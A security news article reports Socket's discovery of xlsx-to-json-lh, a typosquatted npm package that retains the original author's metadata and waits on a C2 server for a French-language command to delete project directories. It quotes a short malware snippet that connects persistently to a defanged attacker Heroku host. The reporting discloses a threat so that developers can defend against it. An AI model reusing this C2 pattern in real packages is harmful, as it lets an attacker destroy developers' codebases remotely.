Stealthy npm Supply Chain Attack: Typosquatting Leads to Remote Code Execution and Data Destruction

In a recent revelation, Socket’s Threat Research Team has uncovered a stealthy npm supply chain attack leveraging typosquatting and remote code execution. The malicious package, named xlsx-to-json-lh, impersonates the legitimate and widely used Excel-to-JSON converter xlsx-to-json-lc — a subtle change of just one letter. Yet the consequences are anything but minor.

“The package remained undetected on npm for six years before discovery,” Socket reports. As of publication, the package remains live on the registry, prompting urgent calls for its removal.

Unlike obvious malware, xlsx-to-json-lh cleverly masquerades as a legitimate module. It actually performs the expected conversion function, allowing it to pass basic functionality tests. But behind the scenes, it imports a secondary payload that connects to a command and control (C2) server — waiting silently for a kill-switch command.

The most dangerous part? No user interaction is needed beyond importing the module. Once loaded, the payload listens for a command labeled “remise à zéro” — French for “reset to zero.” Upon receiving it, the malware recursively deletes the entire project directory, including source files, .git folders, node_modules, configuration files, and everything else in its path.

“Recovery is virtually impossible without external backups,” warns the Socket team.

To fool developers, the malicious package retains the original author’s metadata, mimicking trusted author rahil471 while introducing a new maintainer with the npm alias leonhard. This technique exploits developers’ reliance on metadata for trust signals:

“Developers see the trusted author name and assume safety.”

The package.json file presents this facade seamlessly, offering no overt red flags to the untrained eye — making this attack particularly insidious.

Socket researchers identified strong indicators pointing to a French-speaking attacker. The maintainer’s email address ends in .fr, and the destructive trigger command is written in French. Moreover, the malware uses a socket.io-client to maintain a persistent WebSocket connection to a Heroku-based server:

var io = require('socket.io-client');
var pathName = __dirname;

// Connect to attacker's C2 server
var socket = io.connect("https://informer-server[.]herokuapp[.]com", {
    reconnection: true  // Maintains persistent connection
});

Once connected, it silently awaits orders to detonate the codebase.

The simplicity and scale of this attack are what make it terrifying. Imagine a developer with several project folders infected across their environment:

/home/dev/projects/
├── client-website/        [infected with xlsx-to-json-lh]
├── internal-api/          [infected with xlsx-to-json-lh]
├── data-processor/        [infected with xlsx-to-json-lh]
└── mobile-backend/        [clean]

With one remote command, three projects — and potentially years of work — are erased in seconds. As Socket illustrates:

“20 developers with 2-3 infected projects each means 40-60 codebases destroyed instantly.”

Related Posts:

• Malicious Go Packages Target Developers with Hidden Loader Malware on Linux and macOS
• Typosquatting & Backdoors: Lazarus’ Latest npm Campaign
• Cybercriminals Increasingly Target Google, Microsoft, and Amazon in Sophisticated Phishing Schemes
• Exploring the Mysterious Realm of Free VPNs: An Epic Quest for Cyber Sovereignty and Beyond!
• Malicious PyPI Package Targets Discord Developers with Token Theft and Backdoor Exploit